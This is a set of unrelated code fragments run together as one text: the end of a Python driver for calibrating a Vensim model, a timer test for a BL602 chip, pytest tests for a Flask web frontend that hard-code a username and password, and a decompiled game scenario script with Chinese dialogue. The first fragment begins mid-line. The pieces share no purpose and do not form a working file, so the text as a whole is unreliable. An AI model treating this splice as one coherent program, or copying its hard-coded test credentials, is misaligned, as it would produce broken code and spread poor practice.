f"./{submod}") os.chdir(f"./{submod}") smcf = json.load(open(f"{submod}Control.txt", 'r')) for k in ['baserunname', 'vensimpath']: smcf[k] = cf[k] for file in smcf['simsettings']['changes'] + smcf['simsettings']['data']: copy(f"../{file}", "./") copy(f"../{smcf['baserunname']}_main_full.out", "./") clean_outfile(f"{smcf['baserunname']}_main_full.out", smcf['submodparams']) write_log(f"Running submodel {submod}!", logfile) compile_script(smcf, ScenRunScript, submod, 'base', {}, logfile, chglist=[f"{smcf['baserunname']}_main_full.out"], subdir=None) if smcf['simsettings']['sensitivity']: write_log(f"Sensitivity time for {submod}!", logfile) compile_script(smcf, SMSensScript, submod, 'sens', {}, logfile, chglist=[f"{smcf['baserunname']}_main_full.out"], subdir=None) os.chdir("..") # Remember to go back to main directory before next submodel run! 
# Run sensitivity scenarios using specified variable-value combinations for var, value in sensvars: var_val = f"{var.replace(' ','')[:8]}_{str(value).replace('.','')}" with open(f"{var_val}.cin",'w') as f: f.write(f"{var} = {value}") write_log(f"Running robustness check for {var} = {value}!", logfile) cf['simsettings']['changes'].append(f"{var_val}.cin") compile_script(cf, LongScript, 'sens', var_val, {'model': '_main', 'optparm': '_f'}, logfile, chglist=[('main', 'full')]) compile_script(cf, ScenRunScript, 'sens', f'{var_val}_{scenariolist[0][:-4]}', {'model': '_main'}, logfile, chglist=[('sens', var_val), scenariolist[0]]) cf['simsettings']['changes'].pop() # Remember to remove robustness CIN file! # Run recalibration on sub-sample of countries, dropping those specified for group, drops in droplist.items(): write_log("\'tis but a scratch! Have at you!", logfile) shortlist = [c for c in countrylist if c not in drops] shortmodel = simsettings['model'][:-4] + f'_{group}.mdl' c_list = [f'{c}\\\n\t\t' if i % 8 == 7 else c for i,c in enumerate(shortlist)] countrylist_str = str(c_list)[1:-1].replace("'","") modify_mdl(countrylist_str, simsettings['model'], shortmodel) compile_script(cf, LongScript, 'sens', group, {'model': f'_{group}', 'optparm': '_f'}, logfile, chglist=[('main', 'full')]) compile_script(cf, ScenRunScript, 'sens', f'{group}_{scenariolist[0][:-4]}', {'model': f'_{group}'}, logfile, chglist=[('sens', group), scenariolist[0]]) write_log(f"Log completed at {time.ctime()}. Job done!", logfile)
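# --- Hedged illustration (not part of the calibration script above) ---
# Shows how a compile_script `chglist` entry expands into changes-file names,
# mirroring Script.update_changes; the base run name and country codes are
# hypothetical examples.
def expand_chglist(basename, chglist):
    out = []
    for name, sfx in chglist:
        names = name if isinstance(name, list) else [name]
        out.extend(f"{basename}_{n}_{sfx}.out" for n in names)
    return out

assert expand_chglist('covid', [('main', 0), (['US', 'UK'], 1)]) == \
    ['covid_main_0.out', 'covid_US_1.out', 'covid_UK_1.out']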
from __future__ import print_function
from __future__ import unicode_literals
import time
import re
from tiny_test_fw import DUT, App, TinyFW
from ttfw_bl import BL602App, BL602DUT


@TinyFW.test_method(app=BL602App.BL602App, dut=BL602DUT.BL602TyMbDUT, test_suite_name='bl602_demo_timer_tc')
def bl602_demo_timer_tc(env, extra_data):
    # first, flash dut; then run the timer test
    dut = env.get_dut("port0", "fake app path")
    print('Flashing app')
    dut.flash_app(env.log_path, env.get_variable('flash'))
    print('Starting app')
    dut.start_app()
    timestamp_seq = []
    timediff_seq = []

    try:
        dut.expect("Booting BL602 Chip...", timeout=0.5)
        print('BL602 booted')
        dut.expect('Init CLI with event Driven', timeout=0.5)
        print('BL602 CLI init done')
        time.sleep(0.1)

        # Sample the Timer2 counter five times, roughly one second apart
        for _ in range(5):
            dut.write('timer_us')
            time.sleep(0.1)
            timestamp = dut.expect(re.compile(r"Timer2 value is (\d+)"), timeout=0.1)
            timestamp_seq.append(int(timestamp[0]))
            time.sleep(0.9)

        timestamp_last = 0
        for timestamp in timestamp_seq:
            if timestamp == 0:
                raise RuntimeError('Timer2 returned a zero timestamp')
            if timestamp_last == 0:
                timestamp_last = timestamp
                continue
            timediff_seq.append(timestamp - timestamp_last)
            timestamp_last = timestamp

        for timediff in timediff_seq:
            print(f'time diff is {timediff}')

        # Each interval should be 1 s +/- 10 % (values are in microseconds)
        for timediff in timediff_seq:
            if timediff < 900000 or timediff > 1100000:
                print(f'time diff is NOT ok: {timediff}')
                raise RuntimeError(f'Timer2 interval out of tolerance: {timediff} us')

        dut.halt()
    except DUT.ExpectTimeout:
        print('ENV_TEST_FAILURE: BL602 example test failed')
        raise


if __name__ == '__main__':
    bl602_demo_timer_tc()
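# --- Hedged helper sketch (not used by the test above) ---
# Factors out the interval check: consecutive Timer2 samples are expected about
# 1 s (1,000,000 us) apart, within +/-10 %. The sample values below are illustrative.
def timer_intervals_ok(timestamps_us, expected_us=1000000, tol=0.10):
    diffs = [b - a for a, b in zip(timestamps_us, timestamps_us[1:])]
    return all(abs(d - expected_us) <= expected_us * tol for d in diffs)

assert timer_intervals_ok([0, 1000000, 1995000, 3005000])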
import requests
import json
import pytest
import frontend
from frontend import app
import sys

"""
Test GET and POST functionality for both endpoints
"""


def test_redirect_home_to_login():
    session = requests.Session()
    session.auth = ("reid", "reidreid")
    x = session.get("http://guadr.gonzaga.edu/home")
    # the unauthenticated /home request should land on the login page
    assert 'login' in x.url


def test_login():
    session = requests.Session()
    session.auth = ("reid", "reidreid")
    x = session.get("http://guadr.gonzaga.edu/login")
    assert x.status_code == 200


def test_signup():
    session = requests.Session()
    session.auth = ("reid", "reidreid")
    x = session.get("http://guadr.gonzaga.edu/signup")
    assert x.status_code == 200


def test_vendor():
    session = requests.Session()
    session.auth = ("reid", "reidreid")
    x = session.get("http://guadr.gonzaga.edu/vender")
    assert x.status_code == 200


"""
Test DB
"""


def test_DB():
    with app.app_context():
        frontend.init_db()
        frontend.insert_into_db(
            "INSERT INTO robot_location (del_id, time, latitude, longitude, perc_complete) VALUES (0,0,0,0,0.0)"
        )
        result = frontend.query_db("select * from robot_location where del_id = 0")
        result_fail = frontend.query_db(
            "select * from robot_location where del_id = -1"
        )
        assert result != []
        assert result_fail == []
from ScenarioHelper import * def main(): CreateScenaFile( "e302b.bin", # FileName "e302b", # MapName "e302b", # Location 0x0000, # MapIndex "ed7513", 0x00002000, # Flags ("", "", "", "", "", ""), # include 0x00, # PlaceNameNumber 0x00, # PreInitFunctionIndex b'\x00\xff\xff', # Unknown_51 # Information [0, 0, -1000, 0, 0, 0, 24000, 500, 30, 45, 0, 360, 0, 0, 0, 0, 0, 1, 1, 0, 1, 0, 2], ) BuildStringList(( "e302b", # 0 "正骑士阿巴斯", # 1 "约纳", # 2 "瓦吉", # 3 "缇欧", # 4 "芙兰", # 5 "莉夏", # 6 "兰迪", # 7 "诺艾尔", # 8 "艾莉", # 9 "麦克道尔议长", # 10 "格蕾丝", # 11 "神狼蔡特", # 12 "随从骑士维恩图斯", # 13 "随从骑士朱诺", # 14 )) AddCharChip(( "chr/ch06712.itc", # 00 "chr/ch06102.itc", # 01 "chr/ch03100.itc", # 02 "chr/ch03102.itc", # 03 "chr/ch00202.itc", # 04 "chr/ch06900.itc", # 05 "chr/ch03200.itc", # 06 "chr/ch00302.itc", # 07 "chr/ch06002.itc", # 08 "chr/ch02902.itc", # 09 "chr/ch00102.itc", # 0A "chr/ch05802.itc", # 0B "chr/ch02710.itc", # 0C "chr/ch48400.itc", # 0D )) DeclNpc(101790, 150, -94010, 90, 261, 0x0, 0, 0, 0, 255, 255, 0, 13, 255, 0) DeclNpc(3000, -1350, 6960, 45, 261, 0x0, 0, 1, 0, 255, 255, 0, 15, 255, 0) DeclNpc(101790, 150, -95980, 90, 261, 0x0, 0, 3, 0, 255, 255, 0, 11, 255, 0) DeclNpc(-3119, -1350, 7039, 315, 261, 0x0, 0, 4, 0, 255, 255, 0, 7, 255, 0) DeclNpc(100849, 0, 270, 270, 261, 0x0, 0, 5, 0, 0, 0, 0, 14, 255, 0) DeclNpc(-1500, 0, -1500, 0, 389, 0x0, 0, 6, 0, 255, 255, 255, 255, 255, 0) DeclNpc(97639, 170, 959, 90, 261, 0x0, 0, 7, 0, 255, 255, 0, 8, 255, 0) DeclNpc(100309, 170, 959, 270, 261, 0x0, 0, 9, 0, 255, 255, 0, 9, 255, 0) DeclNpc(100169, 100, -102720, 270, 261, 0x0, 0, 10, 0, 255, 255, 0, 6, 255, 0) DeclNpc(98440, 100, -101110, 180, 261, 0x0, 0, 11, 0, 255, 255, 0, 17, 255, 0) DeclNpc(100220, 100, -104779, 270, 261, 0x0, 0, 8, 0, 255, 255, 0, 16, 255, 0) DeclNpc(-3000, 0, -2500, 0, 389, 0x0, 0, 12, 0, 255, 255, 255, 255, 255, 0) DeclNpc(103569, 0, -97089, 270, 257, 0x0, 0, 13, 0, 0, 0, 0, 19, 255, 0) DeclNpc(103949, 0, -209, 270, 257, 0x0, 0, 13, 0, 0, 0, 0, 21, 255, 0) DeclActor(102510, 0, -97020, 1000, 103570, 1500, -97090, 0x007E, 0, 18, 0x0000) DeclActor(102710, 0, -200, 400, 103950, 1500, -210, 0x007E, 0, 20, 0x0000) DeclActor(2350, 0, -92230, 800, 2350, 1500, -92230, 0x007C, 0, 28, 0x0000) DeclActor(103750, 0, -105640, 2000, 103750, 1500, -105640, 0x007C, 0, 3, 0x0000) ChipFrameInfo(864, 0) # 0 ScpFunction(( "Function_0_360", # 00, 0 "Function_1_410", # 01, 1 "Function_2_509", # 02, 2 "Function_3_54E", # 03, 3 "Function_4_6F6", # 04, 4 "Function_5_831", # 05, 5 "Function_6_D2D", # 06, 6 "Function_7_102D", # 07, 7 "Function_8_1522", # 08, 8 "Function_9_1849", # 09, 9 "Function_10_1967", # 0A, 10 "Function_11_1DBE", # 0B, 11 "Function_12_1EFF", # 0C, 12 "Function_13_24BA", # 0D, 13 "Function_14_26EA", # 0E, 14 "Function_15_2810", # 0F, 15 "Function_16_2BBE", # 10, 16 "Function_17_2F67", # 11, 17 "Function_18_3243", # 12, 18 "Function_19_3247", # 13, 19 "Function_20_3519", # 14, 20 "Function_21_351D", # 15, 21 "Function_22_3700", # 16, 22 "Function_23_3D9F", # 17, 23 "Function_24_43E0", # 18, 24 "Function_25_4A48", # 19, 25 "Function_26_52F2", # 1A, 26 "Function_27_5B69", # 1B, 27 "Function_28_5F76", # 1C, 28 "Function_29_6871", # 1D, 29 "Function_30_6891", # 1E, 30 )) def Function_0_360(): pass label("Function_0_360") Switch( (scpexpr(EXPR_RAND), scpexpr(EXPR_PUSH_LONG, 0x8), scpexpr(EXPR_IMOD), scpexpr(EXPR_END)), (0, "loc_398"), (1, "loc_3A4"), (2, "loc_3B0"), (3, "loc_3BC"), (4, "loc_3C8"), (5, "loc_3D4"), (6, "loc_3E0"), (SWITCH_DEFAULT, "loc_3EC"), ) label("loc_398") OP_A0(0xFE, 1450, 0x0, 
0xFB) Jump("loc_3F8") label("loc_3A4") OP_A0(0xFE, 1550, 0x0, 0xFB) Jump("loc_3F8") label("loc_3B0") OP_A0(0xFE, 1600, 0x0, 0xFB) Jump("loc_3F8") label("loc_3BC") OP_A0(0xFE, 1400, 0x0, 0xFB) Jump("loc_3F8") label("loc_3C8") OP_A0(0xFE, 1650, 0x0, 0xFB) Jump("loc_3F8") label("loc_3D4") OP_A0(0xFE, 1350, 0x0, 0xFB) Jump("loc_3F8") label("loc_3E0") OP_A0(0xFE, 1500, 0x0, 0xFB) Jump("loc_3F8") label("loc_3EC") OP_A0(0xFE, 1500, 0x0, 0xFB) Jump("loc_3F8") label("loc_3F8") Jc((scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_END)), "loc_40F") OP_A0(0xFE, 1500, 0x0, 0xFB) Jump("loc_3F8") label("loc_40F") Return() # Function_0_360 end def Function_1_410(): pass label("Function_1_410") SetMapFlags(0x10000) SetChrChipByIndex(0x8, 0x0) SetChrSubChip(0x8, 0x0) EndChrThread(0x8, 0x0) SetChrBattleFlags(0x8, 0x4) SetChrChipByIndex(0x9, 0x1) SetChrSubChip(0x9, 0x0) EndChrThread(0x9, 0x0) SetChrBattleFlags(0x9, 0x4) SetChrChipByIndex(0xA, 0x3) SetChrSubChip(0xA, 0x0) EndChrThread(0xA, 0x0) SetChrBattleFlags(0xA, 0x4) SetChrChipByIndex(0xB, 0x4) SetChrSubChip(0xB, 0x0) EndChrThread(0xB, 0x0) SetChrBattleFlags(0xB, 0x4) SetChrChipByIndex(0xE, 0x7) SetChrSubChip(0xE, 0x0) EndChrThread(0xE, 0x0) SetChrBattleFlags(0xE, 0x4) SetChrChipByIndex(0x12, 0x8) SetChrSubChip(0x12, 0x0) EndChrThread(0x12, 0x0) SetChrBattleFlags(0x12, 0x4) SetChrChipByIndex(0xF, 0x9) SetChrSubChip(0xF, 0x0) EndChrThread(0xF, 0x0) SetChrBattleFlags(0xF, 0x4) SetChrChipByIndex(0x10, 0xA) SetChrSubChip(0x10, 0x0) EndChrThread(0x10, 0x0) SetChrBattleFlags(0x10, 0x4) SetChrChipByIndex(0x11, 0xB) SetChrSubChip(0x11, 0x0) EndChrThread(0x11, 0x0) SetChrBattleFlags(0x11, 0x4) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1DA, 6)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_4BD") SetChrFlags(0xB, 0x10) label("loc_4BD") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x22, 0)), scpexpr(EXPR_END)), "loc_4D7") ClearScenarioFlags(0x22, 0) SetScenarioFlags(0x0, 0) SetScenarioFlags(0x0, 1) Event(0, 30) Jump("loc_508") label("loc_4D7") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x22, 2)), scpexpr(EXPR_END)), "loc_4EB") ClearScenarioFlags(0x22, 2) Event(0, 29) Jump("loc_508") label("loc_4EB") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x24, 3)), scpexpr(EXPR_END)), "loc_508") ClearScenarioFlags(0x24, 3) SetChrPos(0x0, 102230, 0, -105070, 90) label("loc_508") Return() # Function_1_410 end def Function_2_509(): pass label("Function_2_509") OP_50(0x31, (scpexpr(EXPR_PUSH_LONG, 0xD0), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x0, 0)), scpexpr(EXPR_END)), "loc_527") OP_50(0x1, (scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) ClearScenarioFlags(0x0, 0) label("loc_527") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x0, 1)), scpexpr(EXPR_END)), "loc_53B") OP_24(0x1F2) ClearScenarioFlags(0x0, 1) Jump("loc_541") label("loc_53B") Sound(498, 1, 80, 0) label("loc_541") SetMapObjFlags(0x1, 0x4) ClearMapObjFlags(0x3, 0x10) Return() # Function_2_509 end def Function_3_54E(): pass label("Function_3_54E") OP_C9(0x0, 0x4) OP_C9(0x0, 0x100) OP_E5(0xA) FadeToDark(300, 0, -1) OP_0D() OP_E5(0x5) RunExpression(0x5, (scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) label("loc_573") Jc((scpexpr(EXPR_GET_RESULT, 0x5), scpexpr(EXPR_PUSH_LONG, 0xFF), scpexpr(EXPR_NEQ), scpexpr(EXPR_END)), "loc_6A9") RunExpression(0x5, (scpexpr(EXPR_EXEC_OP, "OP_E5(0x0)"), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) Switch( (scpexpr(EXPR_GET_RESULT, 0x5), scpexpr(EXPR_END)), 
(0, "loc_5AC"), (1, "loc_5DB"), (2, "loc_68D"), (3, "loc_695"), (SWITCH_DEFAULT, "loc_6A4"), ) label("loc_5AC") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1A7, 1)), scpexpr(EXPR_END)), "loc_5CB") OP_2B(0x9A, 0x9B, 0x9C, 0x96, 0x97, 0x98, 0x99, 0xFFFF) Jump("loc_5D6") label("loc_5CB") OP_2B(0x96, 0x97, 0x98, 0x99, 0xFFFF) label("loc_5D6") Jump("loc_6A4") label("loc_5DB") SetMapFlags(0x40000000) OP_E5(0x7) Sleep(500) SetChrName("自动语音") AnonymousTalk( 0xFF, "这里是克洛斯贝尔警察局。\x02", ) CloseMessageWindow() Jc((scpexpr(EXPR_EXEC_OP, "OP_E5(0x4)"), scpexpr(EXPR_END)), "loc_665") AnonymousTalk( 0xFF, "即将受理您的报告。\x02", ) CloseMessageWindow() OP_57(0x0) RunExpression(0x8, (scpexpr(EXPR_PUSH_VALUE_INDEX, 0x2F), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) OP_E5(0xC) SetChrName("自动语音") AnonymousTalk( 0xFF, ( "报告处理完毕,\x01", "辛苦了。\x02", ) ) CloseMessageWindow() Jump("loc_67F") label("loc_665") AnonymousTalk( 0xFF, "没有可以报告的委托。\x02", ) CloseMessageWindow() label("loc_67F") OP_57(0x0) OP_E5(0x8) ClearMapFlags(0x40000000) Jump("loc_6A4") label("loc_68D") Call(0, 4) Jump("loc_6A4") label("loc_695") RunExpression(0x5, (scpexpr(EXPR_PUSH_LONG, 0xFF), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) Jump("loc_6A4") label("loc_6A4") Jump("loc_573") label("loc_6A9") OP_E5(0x6) OP_C9(0x1, 0x4) OP_C9(0x1, 0x100) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x28, 2)), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x28, 3)), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x28, 4)), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x28, 5)), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x28, 6)), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x28, 7)), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x29, 0)), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x2A, 7)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_END)), "loc_6E6") OP_E5(0xB) TalkEnd(0xFF) Call(0, 5) Return() label("loc_6E6") FadeToBright(1000, 0) OP_0D() OP_E5(0xB) TalkEnd(0xFF) Return() # Function_3_54E end def Function_4_6F6(): pass label("Function_4_6F6") OP_E5(0x6) Sleep(100) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x27, 3)), scpexpr(EXPR_END)), "loc_718") SetScenarioFlags(0x2A, 0) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1A0, 0)), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1A7, 1)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_END)), "loc_718") ClearScenarioFlags(0x2A, 0) label("loc_718") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x27, 4)), scpexpr(EXPR_END)), "loc_735") SetScenarioFlags(0x2A, 1) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x180, 2)), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1A1, 2)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_END)), "loc_735") ClearScenarioFlags(0x2A, 1) label("loc_735") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x27, 5)), scpexpr(EXPR_END)), "loc_752") SetScenarioFlags(0x2A, 2) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1A0, 0)), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1A7, 1)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_END)), "loc_752") ClearScenarioFlags(0x2A, 2) label("loc_752") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x27, 6)), scpexpr(EXPR_END)), "loc_76F") SetScenarioFlags(0x2A, 3) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x182, 1)), scpexpr(EXPR_TEST_SCENA_FLAGS, 
MakeScenarioFlags(0x1A7, 1)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_END)), "loc_76F") ClearScenarioFlags(0x2A, 3) label("loc_76F") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x27, 7)), scpexpr(EXPR_END)), "loc_78C") SetScenarioFlags(0x2A, 4) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1A0, 0)), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1A4, 0)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_END)), "loc_78C") ClearScenarioFlags(0x2A, 4) label("loc_78C") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x28, 0)), scpexpr(EXPR_END)), "loc_7A9") SetScenarioFlags(0x2A, 5) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x182, 1)), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x183, 4)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_END)), "loc_7A9") ClearScenarioFlags(0x2A, 5) label("loc_7A9") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x28, 1)), scpexpr(EXPR_END)), "loc_7B5") SetScenarioFlags(0x2A, 6) label("loc_7B5") OP_24(0x1F2) RunExpression(0x9, (scpexpr(EXPR_EXEC_OP, "MiniGame(0x10, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0)"), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) OP_1F() Jc((scpexpr(EXPR_PUSH_VALUE_INDEX, 0x1E), scpexpr(EXPR_PUSH_LONG, 0x2A), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_7FA") Sound(498, 1, 50, 0) Jump("loc_800") label("loc_7FA") Sound(498, 1, 100, 0) label("loc_800") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x28, 2)), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x28, 3)), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x28, 4)), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x28, 5)), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x28, 6)), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x28, 7)), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x29, 0)), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x2A, 7)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_END)), "loc_830") RunExpression(0x5, (scpexpr(EXPR_PUSH_LONG, 0xFF), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) label("loc_830") Return() # Function_4_6F6 end def Function_5_831(): pass label("Function_5_831") EventBegin(0x0) FadeToDark(0, 0, -1) LoadChrToIndex("chr/ch00002.itc", 0x1E) SetChrChipByIndex(0x101, 0x1E) SetChrSubChip(0x101, 0x0) SetChrFlags(0x101, 0x4) SetChrChipByIndex(0xB, 0x12) SetChrSubChip(0xB, 0x0) SetChrChipByIndex(0x8, 0x1A) SetChrSubChip(0x8, 0x0) SetChrChipByIndex(0xC, 0x1B) SetChrSubChip(0xC, 0x0) OP_4B(0xB, 0xFF) OP_4B(0x8, 0xFF) OP_4B(0xC, 0xFF) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1A4, 0)), scpexpr(EXPR_END)), "loc_89A") SetChrChipByIndex(0x9, 0x1) SetChrSubChip(0x9, 0x0) OP_4B(0x9, 0xFF) SetChrPos(0x9, 102700, 0, -102930, 180) label("loc_89A") OP_68(102970, 1000, -104740, 0) MoveCamera(40, 23, 0, 0) OP_6E(500, 0) SetCameraDistance(14560, 0) SetChrPos(0x101, 103020, 100, -105800, 90) SetChrPos(0xB, 101590, 0, -105440, 90) SetChrPos(0xC, 101470, 0, -104110, 135) SetChrPos(0x8, 103000, 0, -104100, 180) FadeToBright(1000, 0) OP_0D() ChrTalk( 0xB, ( "#00205F啊……\x02\x03", "#00204F看样子,罗伊德前辈已经\x01", "在『波波碰!』游戏中\x01", "战胜过所有对手了。\x02", ) ) CloseMessageWindow() ChrTalk( 0xC, ( "#01905F哎哎,真的吗~!?\x02\x03", "#01909F不愧是罗伊德警官……\x01", "实在是太厉害了~!!\x02", ) ) CloseMessageWindow() Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1A4, 0)), scpexpr(EXPR_END)), "loc_9F4") ChrTalk( 0x9, ( "#02302F嘿,的确,\x01", 
"你也挺有一套的嘛。\x02", ) ) CloseMessageWindow() label("loc_9F4") SetChrSubChip(0x101, 0x1) ChrTalk( 0x101, ( "#00009F哈哈,谢谢,\x01", "其实只是运气好而已……\x02", ) ) CloseMessageWindow() ChrTalk( 0x8, ( "#12100F不,在这种脑力游戏中,\x01", "光靠运气是无法取得胜利的。\x02\x03", "#12102F班宁斯,你才是真正的\x01", "『波波碰大师』。\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, "#00012F……这、这真是过奖了。\x02", ) CloseMessageWindow() Jc((scpexpr(EXPR_EXEC_OP, "GetItemNumber(贤者, 0x4)"), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_C33") ChrTalk( 0x8, ( "#12100F哦,对了……\x02\x03", "不介意的话,就收下这个吧。\x02", ) ) CloseMessageWindow() OP_9B(0x0, 0x8, 0x0, 0x1F4, 0x5DC, 0x0) Sleep(500) SetMessageWindowPos(-1, -1, -1, -1) FadeToDark(300, 0, 100) Sound(17, 0, 100, 0) SetChrName("") AnonymousTalk( 0x3E7, ( scpstr(0x1F, 0xF0), scpstr(0x7, 0x0), "获得了。\x02", ) ) CloseMessageWindow() OP_57(0x0) FadeToBright(300, 0) AddItemNumber(贤者, 1) SetMessageWindowPos(14, 280, 60, 3) ChrTalk( 0x8, ( "#12100F这是教会与爱普斯泰恩财团\x01", "以古代秘术为基础,\x01", "共同开发的禁忌核心回路。\x02\x03", "由于性能过强,很难操控,\x01", "所以一直没有正式投入运用……\x02\x03", "#12102F不过,你应该有能力控制它。\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, ( "#00000F嗯,明白了,\x01", "我一定会让它发挥作用的。\x02", ) ) CloseMessageWindow() Jump("loc_CFB") label("loc_C33") ChrTalk( 0x8, ( "#12100F嗯……对了。\x02\x03", "#12102F作为奖励,把这个给你吧。\x02", ) ) CloseMessageWindow() OP_9B(0x0, 0x8, 0x0, 0x1F4, 0x5DC, 0x0) SetMessageWindowPos(-1, -1, -1, -1) FadeToDark(300, 0, 100) Sound(17, 0, 100, 0) SetChrName("") AnonymousTalk( 0x3E7, ( scpstr(0x1F, 0x67), scpstr(0x7, 0x0), "获得了。\x02", ) ) CloseMessageWindow() OP_57(0x0) FadeToBright(300, 0) AddItemNumber(水耀珠, 1) SetMessageWindowPos(14, 280, 60, 3) Sleep(500) ChrTalk( 0x101, ( "#00000F哈哈,谢谢,\x01", "我一定会让它派上用场的。\x02", ) ) CloseMessageWindow() OP_57(0x0) OP_5A() label("loc_CFB") FadeToDark(1000, 0, -1) OP_0D() SetScenarioFlags(0x2A, 7) OP_E0(0x35, 0x0) OP_E0(0x80, 0x0) SetChrChipByIndex(0x101, 0xFF) SetChrSubChip(0x101, 0x0) ClearChrFlags(0x101, 0x4) OP_D7(0x1E) EventEnd(0x5) SetScenarioFlags(0x24, 3) NewScene("e302B", 0, 0, 0) IdleLoop() Return() # Function_5_831 end def Function_6_D2D(): pass label("Function_6_D2D") TalkBegin(0xFE) Jc((scpexpr(EXPR_PUSH_VALUE_INDEX, 0x65), scpexpr(EXPR_PUSH_LONG, 0x14), scpexpr(EXPR_GE), scpexpr(EXPR_END)), "loc_DAA") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1AA, 3)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_D50") Call(0, 22) Jump("loc_DA5") label("loc_D50") ChrTalk( 0x10, ( "#00102F(……待会见吧。)\x02\x03", "#00104F(迟些再来也没关系,\x01", " 请认真做好万全准备。)\x02", ) ) CloseMessageWindow() label("loc_DA5") Jump("loc_1029") label("loc_DAA") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1DA, 5)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_FBE") ChrTalk( 0x10, ( "#00103F解放克洛斯贝尔市作战……\x01", 